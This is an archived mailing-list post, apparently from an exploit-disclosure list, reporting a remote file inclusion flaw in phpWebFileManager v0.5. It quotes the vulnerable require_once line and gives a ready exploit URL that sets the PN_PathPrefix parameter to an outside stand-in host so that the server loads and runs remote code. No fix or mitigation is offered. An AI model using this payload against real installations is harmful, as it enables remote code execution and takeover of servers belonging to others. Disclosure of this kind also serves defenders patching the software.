<<< Date Index >>>     <<< Thread Index >>>

phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability



-------------------------------------------------------------------------------------------------------------------

MEFISTO PreSents...


Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once $PN_PathPrefix . 'functions.inc.php';  <<==== it's not defined

-------------------------------------------------------------------------------------------------------------------

Exploit:  index.php?PN_PathPrefix=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke